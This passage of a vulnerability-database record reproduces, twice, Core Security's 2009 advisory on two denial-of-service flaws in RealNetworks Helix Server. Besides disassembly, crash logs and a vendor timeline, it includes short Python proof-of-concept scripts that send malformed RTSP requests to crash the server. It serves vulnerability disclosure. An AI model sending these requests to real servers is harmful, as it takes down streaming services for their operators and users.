file:\r\n\r\n/-----------\r\n\r\n4068: FATAL ERROR: The server has run out of memory!\r\nFATAL ERROR: Last request was rounded up to 1155072 bytes\r\nTrace:\r\n0x00409C96\r\n...\r\n...\r\n...\r\n0x00000000\r\nFATAL ERROR: Server Terminated\r\n\r\n- -----------/\r\n\r\n\r\n8.2. *Malformed SETUP command handling Denial of Service (CVE-2009-2534)*\r\n\r\nThe problem arises when the 'SETUP' request is handled and the byte 0x2F\r\nis absent in the request line. While handling this kind of malformed\r\nrequest the server crashes with an access violation.\r\n\r\nThe code section which triggers the access violation is:\r\n\r\n/-----------\r\n\r\n0047A490 |. 6A 2F PUSH 2F\r\n0047A492 |. 56 PUSH ESI\r\n0047A493 |. FF15 08425100 CALL DWORD PTR DS:[<&MSVCR71.strchr>]\r\n ; MSVCR71.strchr\r\n\r\n- -----------/\r\n\r\n if only the "/" (0x2F) character is sent, the program tries to copy\r\nfrom 0 and the access violation exception is raised.\r\n\r\n/-----------\r\n\r\n0047A490 |. 6A 2F PUSH 2F\r\n0047A492 |. 56 PUSH ESI\r\n0047A493 |. FF15 08425100 CALL DWORD PTR DS:[<&MSVCR71.strchr>]\r\n ; MSVCR71.strchr\r\n\r\n- -----------/\r\n\r\n The following code reproduces the issue:\r\n\r\n/-----------\r\n\r\nimport socket\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect(('172.16.132.133',554))\r\n\r\nsetRequest = "SETUP / RTSP/1.0\\r\\n\\r\\n"\r\n\r\ns.send(setRequest)\r\ns.close()\r\n\r\n- -----------/\r\n\r\n\r\n9. *Report Timeline*\r\n\r\n. 2009-03-04:\r\nCore Security Technologies notifies RealNetworks of the vulnerability.\r\nCore initially schedules publication of its advisory to April 6th, 2009.\r\n\r\n. 2009-03-16:\r\nCore notifies again RealNetworks of the vulnerability.\r\n\r\n. 2009-03-16:\r\nRealNetworks identifies the vulnerability alert as SPAM.\r\n\r\n. 2009-03-20:\r\nThe RealNetworks team asks Core for a technical description of the\r\nvulnerability.\r\n\r\n. 2009-03-23:\r\nTechnical details sent to RealNetworks team by Core. RealNetworks\r\nacknowledges reception.\r\n\r\n. 2009-03-30:\r\nCore requests information about the plans of RealNetworks to fix the\r\nvulnerabilities.\r\n\r\n. 2009-03-30:\r\nRealNetworks responds that fixes will be included in the next public\r\nrelease - currently targeted for July 2009.\r\n\r\n. 2009-05-04:\r\nCore requests RealNetworks a technical analysis of the vulnerabilities,\r\na list of the affected versions of Helix Server, and a detailed timeline\r\nfor developing, testing and releasing fixes for these vulnerabilities.\r\nIt is only based on that information that Core can reevaluate its\r\nadvisory publication timeframe (which was originally scheduled to be\r\npublished on April 6).\r\n\r\n. 2009-05-05:\r\nRealNetworks responds that fixes will be available in mid-2009, most\r\nlikely in the July time frame, and that to protect its customer base\r\nRealNetworks will not provide additional details until the release is\r\npublicly available.\r\n\r\n. 2009-05-05:\r\nCore requests a more precise estimation for the release of fixes (no\r\nreply received).\r\n\r\n. 2009-05-29:\r\nCore requests again RealNetworks an estimated date for the release of\r\nfixes, and technical details about the issues. In the meantime, the\r\npublication of advisory CORE-2009-0227 is rescheduled for July 15th (no\r\nreply received).\r\n\r\n. 2009-07-16:\r\nAn updated version of the advisory was sent to RealNetworks by Core.\r\nCore requests again information about this issue.\r\n\r\n. 2009-07-17:\r\nCore is made aware that Real Networks has released the Security Update\r\n071409HS [2] on July 14th, which states that version 13.0.0 of the Helix\r\nServer and the Helix Mobile Server have been updated to ensure that the\r\nabove vulnerabilities have been resolved.\r\n\r\n. 2009-07-17:\r\nThe advisory CORE-2009-0227 is published by Core.\r\n\r\n\r\n\r\n10. *References*\r\n\r\n[1] RealNetworks\r\nhttp://www.realnetworks.com/\r\n[2] RealNetworks Security Update 071409HS\r\nhttp://docs.real.com/docs/security/SecurityUpdate071409HS.pdf\r\n\r\n\r\n11. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://www.coresecurity.com/corelabs.\r\n\r\n\r\n12. *About Core Security Technologies*\r\n\r\nCore Security Technologies develops strategic solutions that help\r\nsecurity-conscious organizations worldwide develop and maintain a\r\nproactive process for securing their networks. The company's flagship\r\nproduct, CORE IMPACT, is the most comprehensive product for performing\r\nenterprise security assurance testing. CORE IMPACT evaluates network,\r\nendpoint and end-user vulnerabilities and identifies what resources are\r\nexposed. It enables organizations to determine if current security\r\ninvestments are detecting and preventing attacks. Core Security\r\nTechnologies augments its leading technology solution with world-class\r\nsecurity consulting services, including penetration testing and software\r\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\r\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\r\nhttp://www.coresecurity.com.\r\n\r\n\r\n13. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2009 Core Security\r\nTechnologies and (c) 2009 CoreLabs, and may be distributed freely\r\nprovided that no fee is charged for this distribution and proper credit\r\nis given.\r\n\r\n\r\n14. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.8 (MingW32)\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\r\n\r\niEYEARECAAYFAkpg7eMACgkQyNibggitWa38bgCeNFBQ02cGJvhhtc8eYMaEa9VH\r\nUHMAn3Ngc4GBXkyfSe+hkgJWYtQ13Vjh\r\n=9iPO\r\n-----END PGP SIGNATURE-----\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-11832", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:24:32", "bulletinFamily": "exploit", "description": "", "modified": "2009-07-17T00:00:00", "published": "2009-07-17T00:00:00", "href": "https://packetstormsecurity.com/files/79376/Core-Security-Technologies-Advisory-2009.0227.html", "id": "PACKETSTORM:79376", "type": "packetstorm", "title": "Core Security Technologies Advisory 2009.0227", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \nCore Security Technologies - CoreLabs Advisory \nhttp://www.coresecurity.com/corelabs/ \n \nReal Helix DNA RTSP and SETUP request handler vulnerabilities \n \n \n1. *Advisory Information* \n \nTitle: Real Helix DNA RTSP and SETUP request handler vulnerabilities \nAdvisory ID: CORE-2009-0227 \nAdvisory URL: http://www.coresecurity.com/content/real-helix-dna \nDate published: 2009-07-17 \nDate of last update: 2009-07-17 \nVendors contacted: RealNetworks \nRelease mode: Forced release \n \n \n2. *Vulnerability Information* \n \nClass: Denial of service (DoS) \nRemotely Exploitable: Yes \nLocally Exploitable: No \nBugtraq ID: N/A \nCVE Name: CVE-2009-2533, CVE-2009-2534 \n \n \n3. *Vulnerability Description* \n \nHelix Server is a multi-format cross-platform streaming server. Two \nvulnerabilities have been found, that could allow a remote attacker to \ncrash the Helix Server. \n \nDuring a 'RTSP' (SET_PARAMETERS) request handling, if an empty \n'DataConvertBuffer' parameter is received by the server, it will raise \nan exception reading an invalid direction of memory. This exception is \nusually handled correctly but if you send this malformed request \nmultiple times in a short period of time, it could render the Helix \nServer unresponsive and terminate its execution. \n \nDuring the 'SETUP' request handling, a 0x2F character is searched in the \nrequest line, if this byte is absent the process crashes with an access \nviolation. \n \n \n4. *Vulnerable packages* \n \n. Helix Server Version 12.x \n. Helix Mobile Server Version 12.x \n. The vulnerabilities were investigated on Helix Server Version \n12.0.1.215 (Tahiti) Build 175002/12667 \n \n \n5. *Non-vulnerable packages* \n \n. Helix Server Version 13.0.0 \n. Helix Mobile Server Version 13.0.0 \n \n \n6. *Vendor Information, Solutions and Workarounds* \n \nAccording to the Security Update 071409HS [2] published by RealNetworks: \n\"The vulnerability is resolved on the following platforms by installing \nVersion 13.0.0 of the Helix Server and the Helix Mobile Server. This \nonly pertains to supported versions of the platforms listed below. The \nupdated version will be available on your RealNetworks PAM site after \n12:00 am PST, on July 14, 2009.\" \n \n. Red Hat Enterprise Linux 4 \n. Red Hat Enterprise Linux 5 \n. Sun Solaris 10 \n. Windows 2003 \n \n \n7. *Credits* \n \nThese vulnerabilities were discovered and researched by Damian Frizza \nfrom Core Security Technologies. \n \n \n8. *Technical Description / Proof of Concept Code* \n \n \n8.1. *RTSP request handling Denial of Service (CVE-2009-2533)* \n \nThe problem arises when the 'rmserver' process receives an 'RTSP \n(SET_PARAMETER)' request with no content in the 'DataConvertBuffer' \nparameter. The handling code reads at the memory location zero (0) and \ntriggers an exception, which is handled correctly. However sending this \nmalformed request multiple times renders the rmserver process \nunresponsive and subsequently stops its execution. \n \nThe code section which triggers the exception is: \n \n/----------- \n \n00458066 |. C745 08 00000000 MOV DWORD PTR SS:[EBP+8],0 \n*Sets the content of the local variable to 0 \n0045806D |. 8B10 MOV EDX,DWORD PTR DS:[EAX] \n0045806F |. 50 PUSH EAX \n00458070 |. FF52 2C CALL DWORD PTR DS:[EDX+2C] \n00458073 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] \n00458076 |. 8B10 MOV EDX,DWORD PTR DS:[EAX] * \nTries to read form 0 memory location \n \n- -----------/ \n \nThe following PoC code reproduces the issue: \n \n/----------- \n \nimport socket \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.connect(('172.16.132.133',554)) \n \nsetRequest = \"SET_PARAMETER / RTSP/1.0\\r\\n\" \nsetRequest +=\"DataConvertBuffer: \\r\\n\\r\\n\" \n \nfor i in range(5): \nprint i \ns.send(setRequest) \n \ns.close() \n \n- -----------/ \n \n \n \nThe following output is written in the log file: \n \n/----------- \n \n4068: FATAL ERROR: The server has run out of memory! \nFATAL ERROR: Last request was rounded up to 1155072 bytes \nTrace: \n0x00409C96 \n... \n... \n... \n0x00000000 \nFATAL ERROR: Server Terminated \n \n- -----------/ \n \n \n8.2. *Malformed SETUP command handling Denial of Service (CVE-2009-2534)* \n \nThe problem arises when the 'SETUP' request is handled and the byte 0x2F \nis absent in the request line. While handling this kind of malformed \nrequest the server crashes with an access violation. \n \nThe code section which triggers the access violation is: \n \n/----------- \n \n0047A490 |. 6A 2F PUSH 2F \n0047A492 |. 56 PUSH ESI \n0047A493 |. FF15 08425100 CALL DWORD PTR DS:[<&MSVCR71.strchr>] \n; MSVCR71.strchr \n \n- -----------/ \n \nif only the \"/\" (0x2F) character is sent, the program tries to copy \nfrom 0 and the access violation exception is raised. \n \n/----------- \n \n0047A490 |. 6A 2F PUSH 2F \n0047A492 |. 56 PUSH ESI \n0047A493 |. FF15 08425100 CALL DWORD PTR DS:[<&MSVCR71.strchr>] \n; MSVCR71.strchr \n \n- -----------/ \n \nThe following code reproduces the issue: \n \n/----------- \n \nimport socket \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.connect(('172.16.132.133',554)) \n \nsetRequest = \"SETUP / RTSP/1.0\\r\\n\\r\\n\" \n \ns.send(setRequest) \ns.close() \n \n- -----------/ \n \n \n9. *Report Timeline* \n \n. 2009-03-04: \nCore Security Technologies notifies RealNetworks of the vulnerability. \nCore initially schedules publication of its advisory to April 6th, 2009. \n \n. 2009-03-16: \nCore notifies again RealNetworks of the vulnerability. \n \n. 2009-03-16: \nRealNetworks identifies the vulnerability alert as SPAM. \n \n. 2009-03-20: \nThe RealNetworks team asks Core for a technical description of the \nvulnerability. \n \n. 2009-03-23: \nTechnical details sent to RealNetworks team by Core. RealNetworks \nacknowledges reception. \n \n. 2009-03-30: \nCore requests information about the plans of RealNetworks to fix the \nvulnerabilities. \n \n. 2009-03-30: \nRealNetworks responds that fixes will be included in the next public \nrelease - currently targeted for July 2009. \n \n. 2009-05-04: \nCore requests RealNetworks a technical analysis of the vulnerabilities, \na list of the affected versions of Helix Server, and a detailed timeline \nfor developing, testing and releasing fixes for these vulnerabilities. \nIt is only based on that information that Core can reevaluate its \nadvisory publication timeframe (which was originally scheduled to be \npublished on April 6). \n \n. 2009-05-05: \nRealNetworks responds that fixes will be available in mid-2009, most \nlikely in the July time frame, and that to protect its customer base \nRealNetworks will not provide additional details until the release is \npublicly available. \n \n. 2009-05-05: \nCore requests a more precise estimation for the release of fixes (no \nreply received). \n \n. 2009-05-29: \nCore requests again RealNetworks an estimated date for the release of \nfixes, and technical details about the issues. In the meantime, the \npublication of advisory CORE-2009-0227 is rescheduled for July 15th (no \nreply received). \n \n. 2009-07-16: \nAn updated version of the advisory was sent to RealNetworks by Core. \nCore requests again information about this issue. \n \n. 2009-07-17: \nCore is made aware that Real Networks has released the Security Update \n071409HS [2] on July 14th, which states that version 13.0.0 of the Helix \nServer and the Helix Mobile Server have been updated to ensure that the \nabove vulnerabilities have been resolved. \n \n. 2009-07-17: \nThe advisory CORE-2009-0227 is published by Core. \n \n \n \n10. *References* \n \n[1] RealNetworks \nhttp://www.realnetworks.com/ \n[2] RealNetworks Security Update 071409HS \nhttp://docs.real.com/docs/security/SecurityUpdate071409HS.pdf \n \n \n11. *About CoreLabs* \n \nCoreLabs, the research center of Core Security Technologies, is charged \nwith anticipating the future needs and requirements for information \nsecurity technologies. We conduct our research in several important \nareas of computer security including system vulnerabilities, cyber \nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of \nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers, \nproject information and shared software tools for public use at: \nhttp://www.coresecurity.com/corelabs. \n \n \n12. *About Core Security Technologies* \n \nCore Security Technologies develops strategic solutions that help \nsecurity-conscious organizations worldwide develop and maintain a \nproactive process for securing their networks. The company's flagship \nproduct, CORE IMPACT, is the most comprehensive product for performing \nenterprise security assurance testing. CORE IMPACT evaluates network, \nendpoint and end-user vulnerabilities and identifies what resources are \nexposed. It enables organizations to determine if current security \ninvestments are detecting and preventing attacks. Core Security \nTechnologies augments its leading technology solution with world-class \nsecurity consulting services, including penetration testing and software \nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core \nSecurity Technologies can be reached at 617-399-6980 or on the Web at \nhttp://www.coresecurity.com. \n \n \n13. *Disclaimer* \n \nThe contents of this advisory are copyright (c) 2009 Core Security \nTechnologies and (c) 2009 CoreLabs, and may be distributed freely \nprovided that no fee is charged for this distribution and proper credit \nis given. \n \n \n14. *PGP/GPG Keys* \n \nThis advisory has been signed with the GPG key of Core Security \nTechnologies advisories team, which is available for download at \nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.4.8 (MingW32) \nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org \n \niEYEARECAAYFAkpg7eMACgkQyNibggitWa38bgCeNFBQ02cGJvhhtc8eYMaEa9VH \nUHMAn3Ngc4GBXkyfSe+hkgJWYtQ13Vjh \n=9iPO \n-----END PGP SIGNATURE----- \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/79376/CORE-2009-0227.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}]}
